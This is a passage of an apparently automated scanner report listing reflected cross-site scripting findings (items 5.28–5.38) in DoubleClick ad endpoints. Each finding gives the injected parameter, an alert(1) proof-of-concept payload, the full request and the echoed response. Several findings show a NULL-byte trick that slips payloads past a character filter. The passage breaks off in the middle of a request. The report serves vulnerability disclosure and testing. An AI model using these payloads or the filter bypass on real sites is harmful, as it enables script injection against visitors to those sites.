Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a076a"-alert(1)-"1cdbc5ea870 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=Ga076a"-alert(1)-"1cdbc5ea870&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6498

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
nar-Analysis_300x250.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=Ga076a"-alert(1)-"1cdbc5ea870&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d9/%2a/f%3B234282360%3B1-0%3B0%3B58044029%3B4307-300/250%3B385
...[SNIP]...

5.28. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [destination parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2871e"-alert(1)-"f53a100785a was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=2871e"-alert(1)-"f53a100785a HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6666
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:50:57 GMT
Expires: Sun, 30 Jan 2011 14:50:57 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
l = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=2871e"-alert(1)-"f53a100785ahttp://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d9/%2a/t%3B234282361%3B1-0%3B0%3B58044029%3B4307-300/250%3B38529129/38546886/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PL
...[SNIP]...

5.29. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90f0b"-alert(1)-"64d1b9420e8 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!90f0b"-alert(1)-"64d1b9420e8&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:48:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6638

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Schwab_AI_Q410_Webinar-Analysis_300x250.gif";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!90f0b"-alert(1)-"64d1b9420e8&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d9/%2a/m%3B234282360%3B0-0%3B0%3B58044029%3
...[SNIP]...

5.30. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50fe1'-alert(1)-'b07da9e25d was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=780525050fe1'-alert(1)-'b07da9e25d&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:49:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6390

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Nov 01 17:12:22 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=780525050fe1'-alert(1)-'b07da9e25d&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dc/%2a/v%3B231464797%3B0-0%3B0%3B55598777%3B4307-300/
...[SNIP]...

5.31. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f557d"-alert(1)-"4d059799fd4 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=f557d"-alert(1)-"4d059799fd4&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:49:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6211

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 17:25:10 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
2905/11HI_GENERAL_BACKUP_300x250.jpg";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=f557d"-alert(1)-"4d059799fd4&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d6/%2a/x%3B231464651%3B0-0%3B0%3B55598777%3B4307-300/
...[SNIP]...

5.32. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0092a16"-alert(1)-"41f375ff973 was submitted in the &PID parameter. This input was echoed as 92a16"-alert(1)-"41f375ff973 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250%0092a16"-alert(1)-"41f375ff973&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6187
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 19:27:12 GMT
Expires: Sun, 30 Jan 2011 19:27:12 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 21 21:09:29 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
905/10PR_SOLAR_300x250.jpg";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250%0092a16"-alert(1)-"41f375ff973&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/e0/%2a/h%3B231577755%3B1-0%3B0%3B55598777%3B4307-300/
...[SNIP]...

5.33. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 464a5'-alert(1)-'4eccc377927 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177464a5'-alert(1)-'4eccc377927&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:50:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 540

document.write('<a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177464a5'-alert(1)-'4eccc377927&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/dd/%2a/o;231468429;0-0;0;55598777;4307-300/250;38973922/38991679/1;;~okv=;pc=[TPAS_ID];;~sscs=%
...[SNIP]...

5.34. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bee4"-alert(1)-"2d6795c37b5 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=2bee4"-alert(1)-"2d6795c37b5&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:50:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6199

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 17:25:10 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
g";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=2bee4"-alert(1)-"2d6795c37b5&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/d3/%2a/x%3B231464651%3B0-0%3B0%3B55598777%3B4307-300/250%3B38973935/38991692/2%3B%3B%7Eokv%
...[SNIP]...

5.35. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00a23f1"-alert(1)-"fdfe3d16e87 was submitted in the ASID parameter. This input was echoed as a23f1"-alert(1)-"fdfe3d16e87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1%00a23f1"-alert(1)-"fdfe3d16e87&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6406
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 19:28:40 GMT
Expires: Sun, 30 Jan 2011 19:28:40 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Nov 01 17:12:22 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1%00a23f1"-alert(1)-"fdfe3d16e87&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/e0/%2a/v%3B231464797%3B0-0%3B0%3B55598777%3B4307-300/250%3B38973907/38991664/2%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp:/
...[SNIP]...

5.36. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0874'-alert(1)-'b0888e782fe was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1b0874'-alert(1)-'b0888e782fe&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:50:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6394

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 28 17:44:31 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
et=\"_blank\" href=\"http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1b0874'-alert(1)-'b0888e782fe&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dd/%2a/l%3B235513126%3B1-0%3B0%3B55598777%3B4307-300/250%3B38973908/38991665/2%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp:/
...[SNIP]...

5.37. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1dc92'-alert(1)-'85dfa679d81 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV21dc92'-alert(1)-'85dfa679d81&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:50:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6210

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Oct 25 17:27:21 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189&AN=1512704177&PG=NBCNV21dc92'-alert(1)-'85dfa679d81&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/dd/%2a/m%3B231464693%3B0-0%3B0%3B55598777%3B4307-300/250%3B38973930/38991687/2%3B%3B%7Eokv%3D%3Bpc%3D
...[SNIP]...

5.38. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2724.MSNDPM/B4753684.85

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00d3181"-alert(1)-"1701a13e520 was submitted in the TargetID parameter. This input was echoed as d3181"-alert(1)-"1701a13e520 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adj/N2724.MSNDPM/B4753684.85;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00035/101000000000030140.1?!&&PID=7805250&UIT=G&TargetID=30199189%00d3181"-alert(1)-"1701a13e520&AN=1512704177&PG=NBCNV2&ASID=7fc85c13fabd48efb1f6b2f56b5113f1&destination=;ord=1512704177? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
